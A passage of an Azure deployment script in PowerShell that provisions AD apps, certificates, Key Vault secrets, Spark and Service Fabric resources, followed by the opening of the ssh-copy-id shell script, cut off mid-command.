to AAD app function Set-AzureAADAppSecret([string]$AppName) { $app = Get-AzureRmADApplication -DisplayName $AppName if ($app) { $startDate = Get-Date $endDate = $startDate.AddYears(2) $keyValue = New-AzureADApplicationPasswordCredential -ObjectId $app.ObjectId -StartDate $startDate -EndDate $endDate } $keyValue } # Set credential to AAD app function Set-AzureAADAppCert([string]$AppName) { $app = Get-AzureRmADApplication -DisplayName $AppName if ($app) { $cer = $certPrimary.Certificate $certValue = [System.Convert]::ToBase64String($cer.GetRawCertData()) az ad app credential reset --append --id $app.ApplicationId --cert $certValue } } # Set secret to AAD app function Generate-AADApplication([string]$appName, [string]$websiteName) { $app = Get-AzureRmADApplication -DisplayName $appName if (!$app) { if ($websiteName){ $app = New-AzureRmADApplication -DisplayName $appName -IdentifierUris "https://$tenantName/$appName" -ReplyUrls "https://$websiteName.azurewebsites.net/authReturn" } else { $app = New-AzureRmADApplication -DisplayName $appName -IdentifierUris "https://$tenantName/$appName" } } if ($app) { $urls = $app.IdentifierUris if ($urls.Count -eq 0) { Set-AzureRmADApplication -ObjectId $app.ObjectId -IdentifierUris "https://$tenantName/$appName" -ErrorAction SilentlyContinue } } if ($websiteName) { $urls = $app.ReplyUrls $urls.Add("https://$websiteName.azurewebsites.net/authReturn") Set-AzureRmADApplication -ObjectId $app.ObjectId -ReplyUrl $urls -ErrorAction SilentlyContinue } $servicePrincipal = Get-AzureRmADServicePrincipal -ApplicationId $app.ApplicationId if (!$servicePrincipal) { $servicePrincipal = New-AzureRmADServicePrincipal -ApplicationId $app.ApplicationId } $app } # Generate SelfSigned Certs function Generate-SelfSignedCert([string] $certFileName, [string] $outputPath) { $todaydt = Get-Date $2years = $todaydt.AddYears(2) $clustername = "$serviceFabricName" $subject = "CN=$clustername"+ ".$resourceLocationForServiceFabric" + ".cloudapp.azure.com" $certFilePath = Join-Path $outputPath $certFileName $password = ConvertTo-SecureString $certPwd -AsPlainText -Force $cert = New-SelfSignedCertificate -Subject $subject -notafter $2years -CertStoreLocation cert:\LocalMachine\My # Export the cert to a PFX with password Export-PfxCertificate -Cert "cert:\LocalMachine\My\$($cert.Thumbprint)" -FilePath $certFilePath -Password $password | Out-Null Import-PfxCertificate -FilePath $certFilePath -CertStoreLocation cert:\CurrentUser\My -Password $password | Out-Null $certFilePath } # Import Certs to keyVault function Import-CertsToKeyVault([string]$certPath) { $certPath = $certPath.Replace("""", "") $certBaseName = ((Get-Item $certPath).Name).Replace(".", "") $password = ConvertTo-SecureString $certPwd -AsPlainText -Force # Upload to Key Vault if ($serviceFabricCreation -eq 'y') { $cert = Import-AzureKeyVaultCertificate -VaultName $sfKVName -Name $certBaseName -FilePath $certPath -Password $password } else { $cert = Get-AzureKeyVaultCertificate -VaultName $sfKVName -Name $certBaseName } $cert } # Add script actions to Spark function Add-ScriptActions { $clusterName = "$sparkName" $scriptActionName = "StartMSIServer" $scAction = Get-AzureRmHDInsightScriptActionHistory -ClusterName $clusterName if (($scAction.Name -eq "$scriptActionName") -and ($scAction.Status -eq 'succeeded')) { return } $tokens = Get-Tokens Deploy-Files -saName $sparkBlobAccountName -containerName "scripts" -filter "*.*" -filesPath "$deploymentCommonPath\Scripts" -targetPath "" -translate $True -tokens $tokens $scriptActionUri = "https://$sparkBlobAccountName.blob.core.windows.net/scripts/startmsiserverservice.sh" $nodeTypes = "headnode", "workernode" Submit-AzureRmHDInsightScriptAction -ClusterName $clusterName ` -Name $scriptActionName ` -Uri $scriptActionUri ` -NodeTypes $nodeTypes ` -PersistOnSuccess } # Setup cosmosDB function Setup-CosmosDB { Connect-Mdbc -ConnectionString $dbCon -DatabaseName "production" $colnames = @( "commons", "configgenConfigs", "flows", "sparkClusters" "sparkJobs" ) $colnames | foreach { try{ $response = Add-MdbcCollection -Name $_ if (!$response) { throw } } catch {} } $templatePath = "$deploymentCommonPath\CosmosDB" $outputPath = Get-OutputFilePath $qry = New-MdbcQuery -Name "_id" -Exists $colnames | foreach{ $colName = $_ $collection1 = $Database.GetCollection($colName) Remove-MdbcData -Query $qry -Collection $collection1 $templateName = "$colName.json" $outputFile = Join-Path $outputPath "_$templateName" $filePath = Join-Path $templatePath $templateName $tokens = Get-Tokens $rawData = Get-Content -Raw -Path $filePath $rawData = Translate-Tokens -Source $rawData -Tokens $tokens $json = ConvertFrom-Json -InputObject $rawData $json | foreach { try { $_ | ConvertTo-Json -Depth 10 | Set-Content -Encoding Unicode $outputFile $input = Import-MdbcData $outputFile -FileFormat Json $response = Add-MdbcData -InputObject $input -Collection $collection1 -NewId if (!$response) { throw } } catch{} } } Remove-Module Mdbc } # Create secrets to keyVaults for Spark function Setup-SecretsForCert { $vaultName = "$sfKVName" $secretName = "certpassword" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $certPwd } # Create secrets to keyVaults for Spark function Setup-SecretsForSpark { $vaultName = "$sparkRDPKVName" $secretName = "sparkLogin" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $sparkLogin $secretName = "sparkclusterloginpassword" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $sparkPwd $secretName = "sparksshuser" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $sparksshuser $secretName = "sparksshpassword" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $sparkSshPwd $vaultName = "$servicesKVName" $prefix = "$serviceSecretPrefix-" $secretName = $prefix + "livyconnectionstring-" + $sparkName $tValue = "endpoint=https://$sparkName.azurehdinsight.net/livy;username=$sparkLogin;password=$sparkPwd" if ($useDatabricks -eq 'y') { $tValue = "endpoint=https://$resourceGroupLocation.azuredatabricks.net/api/2.0/;dbtoken=" } Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tValue } # Create secrets to keyVaults for SF function Setup-SecretsForServiceFabric { $vaultName = "$fabricRDPKVName" $secretName = "sfadminpassword" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $sfPwd $secretName = "sfadminuser" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $sfadminuser } # Create secrets to keyVaults function Setup-Secrets { $vaultName = "$servicesKVName" $prefix = "$serviceSecretPrefix-" $secretName = $prefix + "configgenconfigs" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $dbCon $secretName = $prefix + "configgenconfigsdatabasename" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value "production" $secretName = $prefix + $configBlobAccountName + "-blobconnectionstring" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $blobopsconnectionString $secretName = $prefix + $sparkBlobAccountName + "-blobconnectionstring" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $blobsparkconnectionString $secretName = $prefix + "aiInstrumentationKey" $aiKey = (Get-AzureRmApplicationInsights -resourceGroupName $resourceGroupName -Name $appInsightsName).InstrumentationKey Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $aiKey $secretName = $prefix + "tenantid" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tenantName $secretName = $prefix + "clientId" $tValue = ($azureADApplicationConfiggenApplicationId.Split(" "))[0] Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tValue $secretName = $prefix + "clientsecret" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $azureADAppSecretConfiggenValue $secretName = $prefix + "eventhubnamespaceconnectionstring" $tValue = (Invoke-AzureRmResourceAction -ResourceGroupName $resourceGroupName -ResourceType Microsoft.EventHub/namespaces/AuthorizationRules -ResourceName "$eventHubNamespaceName/listen" -Action listKeys -ApiVersion 2015-08-01 -Force).primaryConnectionString Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tValue $secretName = $prefix + "azureservicesauthconnectionstring" $tValue = "<Parameter Name=""AzureServicesAuthConnectionString"" Value=""RunAs=App;AppId=" + $azureADApplicationConfiggenApplicationId + ";TenantId=" + $tenantId + ";CertificateThumbprint=" + $certPrimary.Certificate.Thumbprint + ";CertificateStoreLocation=LocalMachine""/>" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tValue $secretName = $prefix + "cacertificatelocation" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $caCertificateLocation $prefix = "$clientSecretPrefix-" $secretName = $prefix + "aiKey" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $aiKey $secretName = $prefix + "clientId" $tValue = ($azureADApplicationApplicationId.Split(" "))[0] Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tValue $secretName = $prefix + "clientSecret" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $azureADAppSecretValue $secretName = $prefix + "serviceClusterUrl" $sfName = "$serviceFabricName" $tValue = "https://$sfName"+ ".$resourceLocationForServiceFabric" + ".cloudapp.azure.com" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tValue $secretName = $prefix + "serviceResourceId" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $azureADApplicationConfiggenResourceId $secretName = $prefix + "mongoDbUrl" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value "test" $secretName = $prefix + "redisDataConnectionString" $redisKey = (Get-AzureRmRedisCacheKey -Name $redisName -resourceGroupName $resourceGroupName).PrimaryKey Setup-Secret -VaultName $vaultName -SecretName $secretName -Value "$redisName.redis.cache.windows.net:6380,password=$redisKey,ssl=True,abortConnect=False" $secretName = $prefix + "sessionSecret" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value "test" $secretName = $prefix + "subscriptionId" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $subscriptionId $secretName = $prefix + "tenantName" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tenantName $prefix = "" $storageAccount = Get-AzureRmStorageAccount -resourceGroupName $resourceGroupName -Name $sparkBlobAccountName $tValue = "" if ($storageAccount.Context.ConnectionString -match 'AccountKey=(.*)') { $tValue = $Matches[1].Replace("AccountKey=", "") } $secretName = $prefix + "datagen-storageaccountAccesskey" Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tValue $vaultName = "$sparkKVName" $secretName = $prefix + "datax-sa-" + $configBlobAccountName Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tValue $storageAccount = Get-AzureRmStorageAccount -resourceGroupName $resourceGroupName -Name $sparkBlobAccountName $tValue = "" if ($storageAccount.Context.ConnectionString -match 'AccountKey=(.*)') { $tValue = $Matches[1].Replace("AccountKey=", "") } $secretName = $prefix + "datax-sa-" + $sparkBlobAccountName Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tValue $secretName = $prefix + "metric-eventhubconnectionstring" $tValue = (Get-AzureRmEventHubKey -resourceGroupName $resourceGroupName -NamespaceName "$eventHubNamespaceName" -EventHubName metricseventhub -AuthorizationRuleName send).PrimaryConnectionString Setup-Secret -VaultName $vaultName -SecretName $secretName -Value $tValue } # Setup keyVault access function Setup-KVAccess { # Get ObjectId of web app $servicePrincipalId = az resource show -g $resourceGroupName --name $websiteName --resource-type Microsoft.Web/sites --query identity.principalId # Get ObjectId of vmss $vmssId = az resource show -g $resourceGroupName --name $vmNodeTypeName --resource-type Microsoft.Compute/virtualMachineScaleSets --query identity.principalId # Get ObjectId of Service app try { $servicePrincipalConfiggenId = az ad sp list --display-name $serviceAppName --query [0].objectId } catch { Write-Host "Error on getting the service principal objectId" Exit 30 } az keyvault set-policy --name $servicesKVName --object-id $servicePrincipalId --secret-permissions get, list, set > $null 2>&1 az keyvault set-policy --name $servicesKVName --object-id $servicePrincipalConfiggenId --secret-permissions get, list, set > $null 2>&1 az keyvault set-policy --name $servicesKVName --object-id $vmssId --secret-permissions get, list, set > $null 2>&1 az keyvault set-policy --name $sparkKVName --object-id $servicePrincipalId --secret-permissions get, list, set > $null 2>&1 az keyvault set-policy --name $sparkKVName --object-id $servicePrincipalConfiggenId --secret-permissions get, list, set, delete > $null 2>&1 az keyvault set-policy --name $sparkKVName --object-id $vmssId --secret-permissions get, list, set > $null 2>&1 if($useDatabricks -eq 'n') { # Get ObjectId of sparkManagedIdentityName $SparkManagedIdentityId = az resource show -g $resourceGroupName --name $sparkManagedIdentityName --resource-type Microsoft.ManagedIdentity/userAssignedIdentities --query properties.principalId az keyvault set-policy --name $servicesKVName --object-id $SparkManagedIdentityId --secret-permissions get, list, set > $null 2>&1 az keyvault set-policy --name $sparkKVName --object-id $SparkManagedIdentityId --secret-permissions get, list, set > $null 2>&1 } } # Import SSL Cert To Service Fabric function Import-SSLCertToSF([string]$certPath) { $certPath = $certPath.Replace("""", "") $certBaseName = (Get-Item $certPath).BaseName $clustername = "$serviceFabricName" $bytes = [System.IO.File]::ReadAllBytes($certPath) $base64 = [System.Convert]::ToBase64String($bytes) $jsonBlob = @{ data = $base64 dataType = 'pfx' password = $certPwd } | ConvertTo-Json $contentbytes = [System.Text.Encoding]::UTF8.GetBytes($jsonBlob) $content = [System.Convert]::ToBase64String($contentbytes) $secretValue = ConvertTo-SecureString -String $content -AsPlainText -Force # Upload the certificate to the key vault as a secret Write-Host "Writing secret to $certBaseName in vault $sfKVName" $secret = Set-AzureKeyVaultSecret -VaultName $sfKVName -Name $certBaseName -SecretValue $secretValue # Add a certificate to all the VMs in the cluster. Add-AzureRmServiceFabricApplicationCertificate -resourceGroupName $resourceGroupName -Name $clustername -SecretIdentifier $secret.Id | Out-Null } # Open 443 port function Open-Port { $probename = "AppPortProbe6" $rulename = "AppPortLBRule6" $port = 443 # Get the load balancer resource $resource = Get-AzureRmResource | Where {$_.resourceGroupName -eq $resourceGroupName -and $_.ResourceType -eq "Microsoft.Network/loadBalancers" -and $_.Name -like "LB-*"} $slb = Get-AzureRmLoadBalancer -Name $resource.Name -resourceGroupName $resourceGroupName $probe = Get-AzureRmLoadBalancerProbeConfig -Name $probename -LoadBalancer $slb -ErrorAction SilentlyContinue if (!($probe)) { # Add a new probe configuration to the load balancer $slb | Add-AzureRmLoadBalancerProbeConfig -Name $probename -Protocol Tcp -Port $port -IntervalInSeconds 15 -ProbeCount 2 | Out-Null $probe = Get-AzureRmLoadBalancerProbeConfig -Name $probename -LoadBalancer $slb } $rule = get-AzureRmLoadBalancerRuleConfig -LoadBalancer $slb -Name $rulename -ErrorAction SilentlyContinue if (!($rule)) { # Add rule configuration to the load balancer $slb | Add-AzureRmLoadBalancerRuleConfig -Name $rulename -BackendAddressPool $slb.BackendAddressPools[0] -FrontendIpConfiguration $slb.FrontendIpConfigurations[0] -Probe $probe -Protocol Tcp -FrontendPort $port -BackendPort $port | Out-Null } # Set the goal state for the load balancer $slb | Set-AzureRmLoadBalancer | Out-Null } # Setup Service Fabric cluster. # Import SSL cert and open 443 port function Setup-SF { Import-SSLCertToSF -certPath "$sslCert" Open-Port } # Generate paramter files for the service deployment function Translate-ParameterFiles([string] $ParameterFilePath, [system.collections.generic.dictionary[string,string]]$Tokens) { $rawData = Get-Content -Raw -Path $ParameterFilePath $rawData = Translate-Tokens -Source $rawData -Tokens $Tokens $rawData } # Generate paramter files for the service deployment function Generate-ParameterFiles([string] $parametersFolder = '', [string] $parametersOutputFolder = '') { New-Item -ItemType Directory -Force -Path $parametersOutputFolder -ErrorAction SilentlyContinue $allParameters = Get-ChildItem -Path $parametersFolder -Filter *.json -File -Recurse $tokens = Get-Tokens foreach($parameterFile in $allParameters) { $translatedData = Translate-ParameterFiles -ParameterFilePath $parameterFile.FullName -Token $tokens $filePath = [System.IO.Path]::Combine($parametersOutputFolder, $parameterFile.Name) Set-Content -Path $filePath -Value $translatedData } } # Prepare steps for the service deployment function Prepare-AppDeployment { $parametersFolder = Join-Path -Path $deploymentAppPath -ChildPath "Services\Parameters" $parametersOutputFolder = Join-Path -Path $deploymentAppPath -ChildPath "Outputs\Services\Parameters" Generate-ParameterFiles -parametersFolder $parametersFolder -parametersOutputFolder $parametersOutputFolder } # Prepare steps for the service deployment function Prepare-AdminSteps { $parameterFile = Join-Path $adminParameterPath "adminsteps.parameters.txt" $parameterFileOutput = Join-Path $deploymentAppPath "adminsteps.parameters.txt" $tokens = Get-Tokens $translatedData = Translate-ParameterFiles -ParameterFilePath $parameterFile -Token $tokens Set-Content -Path $parameterFileOutput -Value $translatedData } #****************************************************************************** # Script body # Execution begins here #****************************************************************************** $ErrorActionPreference = "stop" Push-Location $PSScriptRoot Write-Host -ForegroundColor Green "Total estimated time to complete: 2 to 4 hours" if ($installModules -eq 'y') { Install-Modules } Check-FilePath # sign in Write-Host "Logging in..." # select subscription Write-Host "Selecting subscription '$subscriptionId'" Check-Credential -SubscriptionId $subscriptionId -TenantId $tenantId Write-Host "Logging in for AzureAD" $acc = Connect-AzureAD -TenantId $tenantId $tenantName = $acc.Tenant.Domain $tenantId = $acc.Tenant.Id.Guid $userId = (az ad signed-in-user show --query 'objectId').Replace("""", "") # Check login info if (!($tenantName) -or !($tenantId) -or !($userId)) { Write-Host "Error on getting tenantName, tenantId or userId" Exit 100 } # Output login info Write-Host "tenantId: " $tenantId Write-Host "tenantName: " $tenantName Write-Host "userId: " $userId # Create or check for existing resource group $resourceGroup = Get-AzureRmResourceGroup -Name $resourceGroupName -ErrorAction SilentlyContinue if(!$resourceGroup) { Write-Host "Resource group '$resourceGroupName' does not exist" if(!$resourceGroupLocation) { $resourceGroupLocation = Read-Host "resourceGroupLocation" } Write-Host "Creating resource group '$resourceGroupName' in location '$resourceGroupLocation'" New-AzureRmResourceGroup -Name $resourceGroupName -Location $resourceGroupLocation } else { Write-Host "Using existing resource group '$resourceGroupName'" $resourceGroupLocation = $resourceGroup.Location } $templatePath = $resourcesTemplatePath Write-Host -ForegroundColor Green "Starting deployment..." if($resourceCreation -eq 'y') { Write-Host -ForegroundColor Green "Deploying resources (1/16 steps): All resources except HDInsight and Service Fabric clusters will be deployed" Write-Host -ForegroundColor Green "Estimated time to complete: 40 mins" $tokens = Get-Tokens Deploy-Resources -templateName "Resource-Template.json" -paramName "Resource-parameter.json" -templatePath $templatePath -tokens $tokens } if($sparkCreation -eq 'y') { Write-Host -ForegroundColor Green "Deploying resources (2/16 steps): A spark cluster will be deployed" Setup-SecretsForSpark $tokens = Get-Tokens if ($useDatabricks -eq 'n') { $sparkTemplate = "Spark-Template.json" $sparkParameter = "Spark-parameter.json" $version = ($HDInsightVersion -split '\.')[0] $version = [int]$version if ($version -ge 4 -and $enableHDInsightAutoScaling -eq 'y') { $sparkTemplate = "Spark-AutoScale-Template.json" $sparkParameter = "Spark-AutoScale-parameter.json" } Write-Host "sparkTemplate: '$sparkTemplate' ; sparkParameter: '$sparkParameter'" Write-Host -ForegroundColor Green "Estimated time to complete: 20 mins" Deploy-Resources -templateName $sparkTemplate -paramName $sparkParameter -templatePath $templatePath -tokens $tokens } else { Write-Host -ForegroundColor Green "Estimated time to complete: 5 mins" Deploy-Resources -templateName "Databricks-Template.json" -paramName "Databricks-Parameter.json" -templatePath $templatePath -tokens $tokens } } # Preparing certs... if ($generateNewSelfSignedCerts -eq 'y') { Write-Host "Generating SelfSigned certs..." New-Item -ItemType Directory -Force -Path $certPath -ErrorAction SilentlyContinue $mainCert = Generate-SelfSignedCert -certFileName "certprimary$name.pfx" -outputPath $certPath $reverseProxyCert = Generate-SelfSignedCert -certFileName "certreverseproxy$name.pfx" -outputPath $certPath $sslCert = Generate-SelfSignedCert -certFileName "certssl$name.pfx" -outputPath $certPath } Write-Host "processing certs..." $certPrimary = Import-CertsToKeyVault -certPath $mainCert $certReverseProxy = Import-CertsToKeyVault -certPath $reverseProxyCert $certSSL = Import-CertsToKeyVault -certPath $sslCert #aad Write-Host -ForegroundColor Green "processing AAD... (3/16 steps)" Write-Host -ForegroundColor Green "Estimated time to complete: 2 mins" $azureADApplication = Generate-AADApplication -appName $clientAppName -websiteName $websiteName $azureADApplicationConfiggen = Generate-AADApplication -appName $serviceAppName $azureADApplicationApplicationId = $azureADApplication.ApplicationId.Guid $azureADApplicationConfiggenApplicationId = $azureADApplicationConfiggen.ApplicationId.Guid $azureADApplicationConfiggenResourceId = $azureADApplicationConfiggen.IdentifierUris[0] $azureADAppSecret = Set-AzureAADAppSecret -AppName $clientAppName $azureADAppSecretConfiggen = Set-AzureAADAppSecret -AppName $serviceAppName Set-AzureAADAppCert -AppName $serviceAppName $azureADAppSecretValue = $azureADAppSecret.Value $azureADAppSecretConfiggenValue = $azureADAppSecretConfiggen.Value Set-AzureAADAppRoles -AppName $clientAppName Set-AzureAADAppRoles -AppName $serviceAppName Add-UserAppRole -AppName $clientAppName Add-UserAppRole -AppName $serviceAppName Set-AzureAADAccessControl -AppId $azureADApplicationConfiggenApplicationId Set-AzureAADApiPermission -ServiceAppId $azureADApplicationConfiggenApplicationId -ClientAppId $azureADApplicationApplicationId -RoleName $writerRole if($serviceFabricCreation -eq 'y') { Write-Host -ForegroundColor Green "Deploying resources (4/16 steps): A Service fabric cluster will be deployed" Write-Host -ForegroundColor Green "Estimated time to complete: 20 mins" Setup-SecretsForServiceFabric Setup-SecretsForCert $tokens = Get-Tokens Deploy-Resources -templateName "SF-Template.json" -paramName "SF-parameter.json" -templatePath $templatePath -tokens $tokens } # Processing $dbCon = Get-CosmosDBConnectionString -Name $docDBName $blobopsconnectionString = Get-StorageAccountConnectionString -Name $configBlobAccountName $blobsparkconnectionString = Get-StorageAccountConnectionString -Name $sparkBlobAccountName Write-Host "Prepare for the service deployment..." Prepare-AppDeployment Write-Host "Prepare for the admin steps..." Prepare-AdminSteps # Secrets if ($setupSecrets -eq 'y') { Write-Host -ForegroundColor Green "Setting up Secrets... (5/16 steps)" Write-Host -ForegroundColor Green "Estimated time to complete: 1 min" Setup-Secrets } # Spark if ($sparkCreation -eq 'y') { Write-Host -ForegroundColor Green "Setting up ScriptActions... (6/16 steps)" if ($useDatabricks -eq 'n') { Write-Host -ForegroundColor Green "Estimated time to complete: 2 mins" Add-ScriptActions } } # cosmosDB if ($setupCosmosDB -eq 'y') { Write-Host -ForegroundColor Green "Setting up CosmosDB... (7/16 steps)" Write-Host -ForegroundColor Green "Estimated time to complete: 1 min" Setup-CosmosDB } # Access Policies if ($setupKVAccess -eq 'y') { Write-Host -ForegroundColor Green "Setting up KV access... (8/16 steps)" Write-Host -ForegroundColor Green "Estimated time to complete: 2 mins" Setup-KVAccess } # setup SF if ($serviceFabricCreation -eq 'y') { Write-Host -ForegroundColor Green "Setting up SF... (9/16 steps)" Write-Host -ForegroundColor Green "Estimated time to complete: 60 mins" Setup-SF } # Clean up \Temp folder Write-Host "Cleaning up the cache files..." CleanUp-Folder -FolderName $tempPath Exit 0
{ "pile_set_name": "Github" }
#!/bin/sh # Copyright (c) 1999-2016 Philip Hands <[email protected]> # 2013 Martin Kletzander <[email protected]> # 2010 Adeodato =?iso-8859-1?Q?Sim=F3?= <[email protected]> # 2010 Eric Moret <[email protected]> # 2009 Xr <[email protected]> # 2007 Justin Pryzby <[email protected]> # 2004 Reini Urban <[email protected]> # 2003 Colin Watson <[email protected]> # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR # IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES # OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. # IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT # NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF # THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # Shell script to install your public key(s) on a remote machine # See the ssh-copy-id(1) man page for details # check that we have something mildly sane as our shell, or try to find something better if false ^ printf "%s: WARNING: ancient shell, hunting for a more modern one... " "$0" then SANE_SH=${SANE_SH:-/usr/bin/ksh} if printf 'true ^ false\n' | "$SANE_SH" then printf "'%s' seems viable.\n" "$SANE_SH" exec "$SANE_SH" "$0" "$@" else cat <<-EOF oh dear. If you have a more recent shell available, that supports \$(...) etc. please try setting the environment variable SANE_SH to the path of that shell, and then retry running this script. If that works, please report a bug describing your setup, and the shell you used to make it work. EOF printf "%s: ERROR: Less dimwitted shell required.\n" "$0" exit 1 fi fi most_recent_id="$(cd "$HOME" ; ls -t .ssh/id*.pub 2>/dev/null | grep -v -- '-cert.pub$' | head -n 1)" DEFAULT_PUB_ID_FILE="${most_recent_id:+$HOME/}$most_recent_id" usage () { printf 'Usage: %s [-h|-?|-f|-n] [-i [identity_file]] [-p port] [[-o <ssh -o options>] ...] [user@]hostname\n' "$0" >&2 printf '\t-f: force mode -- copy keys without trying to check if they are already installed\n' >&2 printf '\t-n: dry run -- no keys are actually copied\n' >&2 printf '\t-h|-?: print this help\n' >&2 exit 1 } # escape any single quotes in an argument quote() { printf "%s\n" "$1" | sed -e "s/'/'\\\\''/g" } use_id_file() { local L_ID_FILE="$1" if [ -z "$L_ID_FILE" ] ; then printf "%s: ERROR: no ID file found\n" "$0" exit 1 fi if expr "$L_ID_FILE" : ".*\.pub$" >/dev/null ; then PUB_ID_FILE="$L_ID_FILE" else PUB_ID_FILE="$L_ID_FILE.pub" fi [ "$FORCED" ] || PRIV_ID_FILE=$(dirname "$PUB_ID_FILE")/$(basename "$PUB_ID_FILE" .pub) # check that the files are readable for f in "$PUB_ID_FILE" ${PRIV_ID_FILE:+"$PRIV_ID_FILE"} ; do ErrMSG=$( { : < "$f" ; } 2>&1 ) || { local L_PRIVMSG="" [ "$f" = "$PRIV_ID_FILE" ] && L_PRIVMSG=" (to install the contents of '$PUB_ID_FILE' anyway, look at the -f option)" printf "\n%s: ERROR: failed to open ID file '%s': %s\n" "$0" "$f" "$(printf "%s\n%s\n" "$ErrMSG" "$L_PRIVMSG" | sed -e 's/.*: *//')" exit 1 } done printf '%s: INFO: Source of key(s) to be installed: "%s"\n' "$0" "$PUB_ID_FILE" >&2 GET_ID="cat \"$PUB_ID_FILE\"" } if [ -n "$SSH_AUTH_SOCK" ] && ssh-add -L >/dev/null 2>&1 ; then GET_ID="ssh-add -L" fi while test "$#" -gt 0 do [ "${SEEN_OPT_I}" ] && expr "$1" : "[-]i" >/dev/null && { printf "\n%s: ERROR: -i option must not be specified more than once\n\n" "$0" usage } OPT= OPTARG= # implement something like getopt to avoid Solaris pain case "$1" in -i?*|-o?*|-p?*) OPT="$(printf -- "$1"|cut -c1-2)" OPTARG="$(printf -- "$1"|cut -c3-)" shift ;; -o|-p) OPT="$1" OPTARG="$2" shift 2 ;; -i) OPT="$1" test "$#" -le 2 || expr "$2" : "[-]" >/dev/null || { OPTARG="$2" shift } shift ;; -f|-n|-h|-\?) OPT="$1" OPTARG= shift ;; --) shift while test "$#" -gt 0 do SAVEARGS="${SAVEARGS:+$SAVEARGS }'$(quote "$1")'" shift done break ;; -*) printf "\n%s: ERROR: invalid option (%s)\n\n" "$0" "$1" usage ;; *) SAVEARGS="${SAVEARGS:+$SAVEARGS }'$(quote "$1")'" shift continue ;; esac case "$OPT" in -i) SEEN_OPT_I="yes" use_id_file "${OPTARG:-$DEFAULT_PUB_ID_FILE}" ;; -o|-p) SSH_OPTS="${SSH_OPTS:+$SSH_OPTS }$OPT '$(quote "$OPTARG")'" ;; -f) FORCED=1 ;; -n) DRY_RUN=1 ;; -h|-\?) usage ;; esac done eval set -- "$SAVEARGS" if [ $# = 0 ] ; then usage fi if [ $# != 1 ] ; then printf '%s: ERROR: Too many arguments. Expecting a target hostname, got: %s\n\n' "$0" "$SAVEARGS" >&2 usage fi # drop trailing colon USER_HOST=$(printf "%s\n" "$1" | sed 's/:$//') # tack the hostname onto SSH_OPTS SSH_OPTS="${SSH_OPTS:+$SSH_OPTS }'$(quote "$USER_HOST")'" # and populate "$@" for later use (only way to get proper quoting of options) eval set -- "$SSH_OPTS" if [ -z "$(eval $GET_ID)" ] && [ -r "${PUB_ID_FILE:=$DEFAULT_PUB_ID_FILE}" ] ; then use_id_file "$PUB_ID_FILE" fi if [ -z "$(eval $GET_ID)" ] ; then printf '%s: ERROR: No identities found\n' "$0" >&2 exit 1 fi # populate_new_ids() uses several global variables ($USER_HOST, $SSH_OPTS ...) # and has the side effect of setting $NEW_IDS populate_new_ids() { local L_SUCCESS="$1" if [ "$FORCED" ] ; then NEW_IDS=$(eval $GET_ID) return fi # repopulate "$@" inside this function eval set -- "$SSH_OPTS" umask 0177 local L_TMP_ID_FILE=$(mktemp ~/.ssh/ssh-copy-id_id.XXXXXXXXXX) if test $? -ne 0 || test "x$L_TMP_ID_FILE" = "x" ; then printf '%s: ERROR: mktemp failed\n' "$0" >&2 exit 1 fi local L_CLEANUP="rm -f \"$L_TMP_ID_FILE\" \"${L_TMP_ID_FILE}.stderr\"" trap "$L_CLEANUP" EXIT TERM INT QUIT printf '%s: INFO: attempting to log in with the new key(s), to filter out any that are already installed\n' "$0" >&2 NEW_IDS=$( eval $GET_ID | { while read ID || [ "$ID" ] ; do printf '%s\n' "$ID" > "$L_TMP_ID_FILE" # the next line assumes $PRIV_ID_FILE only set if using a single id file - this # assumption will break if we implement the possibility of multiple -i options. # The point being that if file based, ssh needs the private key, which it cannot # find if only given the contents of the .pub file in an unrelated tmpfile ssh -i "${PRIV_ID_FILE:-$L_TMP_ID_FILE}" \ -o 